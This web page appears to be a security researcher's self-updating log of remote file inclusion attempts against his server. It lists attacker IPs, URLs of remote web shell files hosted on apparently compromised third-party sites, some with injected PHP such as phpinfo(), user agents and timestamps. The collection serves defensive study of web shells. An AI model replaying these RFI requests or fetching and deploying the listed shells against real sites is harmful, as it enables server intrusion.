Web Shells and RFIs Collection

Web Shells and RFIs Collection

      I wrote a little script to periodically look through my web logs for unique RFIs and Web Shells, and then collect them on one page where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple time, so I ignore the time fields in judging if an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer hiding service so it does not look like I'm attacking anyone with the web shells (but the check for 404 sort of looks suspicious). This page will also let you link off to defense.ballastsecurity.net where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo, it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells you are likely pwned and should clean up your server.

Source code that generates this page

Filtered For More Likely Live Webshell RFIs

AttackerWhois IPRequest
(Truncated if over 60 chr for display, link should still work)
View on PHP DecoderAgentRefererTimeBackup
13.57.16.181Whoishttp://www.angochagua.gob.ec/tst.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-07/Apr/2019:17:40:57 -0700Archived Webshell
198.27.76.36Whoishttp://investmatch.org/components/barao.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-04/Apr/2019:22:29:21 -0700Archived Webshell
186.249.214.39Whoishttp://www.kbkcarreletdor.fr/fr/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-27/Mar/2019:09:16:37 -0700Archived Webshell
186.249.214.83Whoishttp://nationalautoacceptance.com/iph.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-05/Mar/2019:04:04:39 -0800Archived Webshell
187.79.12.14Whoishttp://lojadosvinhos.com/modules/mod_menu/tmpl/cache.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-19/Feb/2019:18:43:34 -0800Archived Webshell
3.84.58.181Whoishttp://tourcoing2010.free.fr/images/fbfiles/drivenet.txt?View on PHP Decoder--04/Feb/2019:15:01:58 -0800Archived Webshell

Likely Dead Links

AttackerWhois IPRequest
(Truncated if over 60 chr for display, link should still work)
View on PHP DecoderAgentRefererTimeBackup
111.73.46.87Whoishttp://73.46.87/code.txtView on PHP DecoderMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36-01/Apr/2019:22:09:10 -0700Not In Archive
111.73.46.87Whoishttp://73.46.87/22.txt&wpaa=phpinfo();exit();View on PHP DecoderMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36-27/Mar/2019:13:32:40 -0700Not In Archive
40.117.125.94Whoishttp://lojadosvinhos.com/modules/mod_menu/tmpl/cache.txtView on PHP Decoder--17/Mar/2019:10:38:59 -0700Archived Webshell
40.117.125.94Whoishttp://www.fridayspanama.com//wp-content/cmd.txt?View on PHP Decoder--16/Mar/2019:23:54:30 -0700Archived Webshell
118.38.193.174Whoishttp://irongeek.com/ws/adcuploader.txtView on PHP DecoderMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36-16/Mar/2019:16:36:37 -0700Not In Archive
187.95.227.2Whoishttp://GET /i.php?page=https://santadernetilb.cloudaccess.hoView on PHP Decoder--13/Mar/2019:05:48:12 -0700Not In Archive
18.228.15.202Whoishttp://tumkalip.com.tr/tst.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-02/Mar/2019:12:28:14 -0800Archived Webshell
218.248.19.102Whoishttp://www.klubowa.inowroclaw.info/administrator/images/veroView on PHP Decoderlibwww-perl/5.834-18/Jan/2019:22:46:19 -0800Archived Webshell
144.217.233.128Whoishttp://www.naszaprzychodnia.info/components/zeno.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-03/Mar/2019:20:03:22 -0800Archived Webshell
73.59.31.246Whoishttp://206/hello.txtView on PHP DecoderMozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0-23/Feb/2019:16:49:33 -0800Not In Archive
168.197.12.36Whoishttp://www.taxpark.com/etc/843/cmd.txt?&&r=s&View on PHP Decoder--04/Jan/2019:01:04:12 -0800Archived Webshell
138.36.20.212Whoishttp://gruppofilodoro.org/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-04/Feb/2019:18:16:47 -0800Archived Webshell
37.120.135.68Whoishttp://www.sonangnon.org/components/com_weblinks/helpers/cmdView on PHP Decoder--17/Feb/2019:11:10:27 -0800Archived Webshell
115.143.114.144Whoishttp://www.koreapaper.co.kr/board/data/qna/vero.txt?View on PHP Decoderlibwww-perl/5.805-03/Feb/2019:08:53:16 -0800Archived Webshell
186.249.214.151Whoishttp://athletisme.ussene.org/components/CMD-RFI.txt?View on PHP Decoder--30/Jan/2019:07:57:20 -0800Archived Webshell
66.70.242.115Whoishttp://garazi.baigorri.free.fr//images/envi.txt?View on PHP Decoder--27/Dec/2018:21:50:29 -0800Archived Webshell
187.40.31.126Whoishttp://www.elementykute.preiss.com.pl/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-25/Jan/2019:17:18:45 -0800Archived Webshell
187.79.3.203Whoishttp://curso-xpl.online/cmd.txt?&&r=s&View on PHP Decoder--27/Jan/2019:03:31:43 -0800Archived Webshell
182.61.161.122Whoishttp://43.255.29.112/php/dd.txt&vars[1][]=coonig.php%20%2View on PHP DecoderMozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)-22/Jan/2019:15:41:41 -0800Not In Archive
182.61.161.122Whoishttp://43.255.29.112/php/dd.txt&vars[1][]=coonig.php%2View on PHP DecoderMozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)-22/Jan/2019:15:41:41 -0800Not In Archive
182.61.161.122Whoishttp://43.255.29.112/php/dd.txt&vars[1][]=coonig.phpView on PHP DecoderMozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)-22/Jan/2019:15:41:41 -0800Not In Archive
189.89.11.226Whoishttp://GET /index.php/images/othervids/downloads/i.php?page=View on PHP Decoder--19/Jan/2019:23:15:10 -0800Not In Archive
189.89.11.226Whoishttp://GET /index.php/downloads/images/downloads/slax/i.php?View on PHP Decoder--19/Jan/2019:23:15:10 -0800Not In Archive
189.89.11.226Whoishttp://GET /i.php?page=https://espacoquimica.com.br/wp-incluView on PHP Decoder--19/Jan/2019:23:15:10 -0800Not In Archive
35.227.27.176Whoishttp://leloupsculptuur.eu/images/jairobr.txt??View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-07/Jan/2019:19:06:28 -0800Archived Webshell
45.76.205.74Whoishttp://t.server-3v.com/Webshell%5C/php%5C/info.txt&vars[1][]View on PHP DecoderMozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36-22/Dec/2018:01:39:19 -0800Not In Archive
177.47.27.246Whoishttp://www.estelledougier.com/shell/cmd.txt?&&r=s&View on PHP Decoder--16/Dec/2018:16:13:45 -0800Archived Webshell
187.40.30.89Whoishttp://lojadosvinhos.com/modules/mod_menu/tmpl/cache.txt?View on PHP Decoder--05/Dec/2018:22:10:55 -0800Archived Webshell
191.43.44.188Whoishttp://www.cms.drk-rettungsdienst-esnt.de/plugins/tmp/rettunView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Nov/2018:20:27:11 -0800Archived Webshell
41.63.178.98Whoishttp://GET /i.php?page=security/wargames&mode=htTp://www.gooView on PHP DecoderUserAgent-20/Nov/2018:01:13:54 -0800Not In Archive
41.63.178.98Whoishttp://www.google.com/humans.txt&mode=printView on PHP DecoderUserAgent-20/Nov/2018:01:13:49 -0800Not In Archive
41.63.178.98Whoishttp://GET /i.php?page=htTp://www.google.com/humans.txt&modeView on PHP DecoderUserAgent-20/Nov/2018:01:13:49 -0800Not In Archive
187.79.4.196Whoishttp://pppmorag.com.pl/ts.txt?View on PHP Decoder--12/Nov/2018:12:41:28 -0800Archived Webshell
179.124.233.105Whoishttp://www.schr.krakow.pl//images/r.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-11/Oct/2018:07:59:24 -0700Archived Webshell
186.193.183.27Whoishttp://lnimoveissmi.com.br/imagens/contatos/macaco.txtView on PHP Decoder--07/Nov/2018:02:43:06 -0800Archived Webshell
186.193.183.242Whoishttp://medicina.udea.edu.co/a1.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-22/Oct/2018:06:15:28 -0700Archived Webshell
189.89.3.67Whoishttp://www.tibelec.fr/02.txt??02View on PHP Decoder--03/Nov/2018:21:47:46 -0700Archived Webshell
186.249.211.128Whoishttp://www.kbkcarreletdor.fr/fr/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Oct/2018:06:17:23 -0700Archived Webshell
120.92.10.237Whoishttp://20.92.10.237/asd.txt?View on PHP Decoderpython-requests/2.19.1-02/Nov/2018:17:53:55 -0700Not In Archive
120.92.10.237Whoishttp://20.92.10.237/asd.txt?View on PHP Decoderpython-requests/2.19.1-02/Nov/2018:17:53:54 -0700Not In Archive
179.124.234.165Whoishttp://www.sjipr.in//images/cvl.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-23/Oct/2018:09:59:40 -0700Archived Webshell
51.75.12.170Whoishttp://www.petiteetgrandecuisinedesimone.com/aligue/Images/iView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Oct/2018:15:11:34 -0700Archived Webshell
187.40.34.215Whoishttp://acisobral.com.br/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-29/Oct/2018:14:46:58 -0700Archived Webshell
186.193.187.218Whoishttp://medicina.udea.edu.co/a1.txt??View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-10/Oct/2018:19:07:29 -0700Archived Webshell
189.90.39.191Whoishttp://angersnautique.org/cache.txt?View on PHP Decoder--19/Oct/2018:12:03:22 -0700Archived Webshell
123.231.109.103Whoishttp://www.google.com/humans.txtView on PHP DecoderUserAgent-15/Oct/2018:19:12:58 -0700Not In Archive
123.231.109.103Whoishttp://GET /i.php?page=htTp://www.google.com/humans.txtView on PHP DecoderUserAgent-15/Oct/2018:19:12:58 -0700Not In Archive
198.50.158.228Whoishttp://www.naszaprzychodnia.info/includes/barao.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-11/Oct/2018:15:31:44 -0700Archived Webshell



If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek